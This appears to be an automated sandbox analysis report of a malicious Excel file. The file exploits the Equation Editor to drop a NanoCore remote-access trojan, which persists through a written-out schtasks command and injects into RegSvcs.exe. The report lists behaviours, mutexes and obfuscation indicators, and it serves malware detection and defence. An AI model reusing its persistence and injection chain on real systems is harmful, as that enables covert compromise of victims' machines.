Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F110F NtQuerySystemInformation, 9_2_003F110F
PE file contains strange resources
Source: nano[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: nano[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: smsBuojZSZn.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: F99 SEP-15 Price Inquiry.xlsx ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................-.........E.R.R.O.R.:. ...T.......................1.......................................8.........................-..... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................-.........E.R.R.O.(.P.....T.......................7...............................................X.................-..... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 6_2_00490952 AdjustTokenPrivileges, 6_2_00490952
Source: C:\Users\Public\vbc.exe Code function: 6_2_0049091B AdjustTokenPrivileges, 6_2_0049091B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F0F0A AdjustTokenPrivileges, 9_2_003F0F0A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F0ED3 AdjustTokenPrivileges, 9_2_003F0ED3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$F99 SEP-15 Price Inquiry.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF8B0.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/25@31/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\TSQuFEHGeCfwEOqlj
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{42fc7104-2795-42db-8417-dc7142ab8b68}
Source: vbc.exe String found in binary or memory: erminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle>
Source: vbc.exe String found in binary or memory: erminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle>
Source: nano[1].exe.4.dr, u0003u2001.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, u0003u2001.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: smsBuojZSZn.exe.6.dr, u0003u2001.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.cd0000.0.unpack, u0003u2001.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.cd0000.1.unpack, u0003u2001.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: bvcs.pdbg source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbPP source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: qC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: newmeforever12.3utilities.comsymbols\dll\System.pdbP source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: nano[1].exe.4.dr, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: smsBuojZSZn.exe.6.dr, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.cd0000.0.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.cd0000.1.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CD580E push ecx; iretd 6_2_00CD581B
Source: C:\Users\Public\vbc.exe Code function: 6_2_001572BC push eax; ret 6_2_001572BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_001574D4 pushfd ; ret 6_2_001574E5
Source: C:\Users\Public\vbc.exe Code function: 6_2_0015726E push eax; ret 6_2_00157285
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458E63 push E6FFFFFFh; retf 6_2_00458E68
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C80D25 push ecx; ret 6_2_00C80D5C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_002174A8 push ebp; ret 9_2_002174A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_0021749C push ecx; ret 9_2_0021749D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_0021989B push ecx; retf 0021h 9_2_002198A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_00219D20 pushad ; retf 9_2_00219D21
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_00219D1C push eax; retf 9_2_00219D1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_00CF01B9 push ecx; iretd 9_2_00CF01BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_02380F71 push C300DB29h; ret 9_2_02380F80
Source: initial sample Static PE information: section name: .text entropy: 7.89214580367
Source: initial sample Static PE information: section name: .text entropy: 7.89214580367
Source: initial sample Static PE information: section name: .text entropy: 7.89214580367
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\smsBuojZSZn.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
